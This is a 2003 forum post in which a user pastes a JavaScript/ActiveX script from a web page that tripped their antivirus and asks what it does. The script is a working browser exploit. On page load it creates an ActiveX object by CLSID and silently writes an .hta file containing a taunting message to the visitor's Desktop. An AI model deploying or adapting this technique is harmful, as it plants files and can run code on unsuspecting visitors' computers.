
-----------------------------------
Thuged_Out_G
Thu Nov 20, 2003 9:09 pm

Javascript/ActiveX
-----------------------------------
i came across this script on the net, and it somehow apparently fucks up your registry, i know it does something...because my virus scanner tells me when i view the page, found some file.U2 or UD i cant remember lol, anways...can someone make sense of this script?







a1=document.applets[0];
fn="..\\\\Desktop\\\\auzy.hta";
doc="s1=\'You should be ashamed.\\nYou Have been manipulated by Auzy.\\nI know your IP... You could be destroyed by my awesome power \\nSoon, I will tell u how I did this and u will realize that\\nI actually could have done worse like format your HD\\nSo I cannot be held responsible.\\nIt is all your fault.\\nNext Time u wont be so lucky.\\n\\nAuzy\\n\';alert(s1);document.body.innerHTML=s1";
function f1()
{
a1.setProperty('DOC',doc);
}

function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" created');",2000);
}
setTimeout("f()",1000)


VA = ARRAY()
' Just to get something like com.ms.com.Variant[]

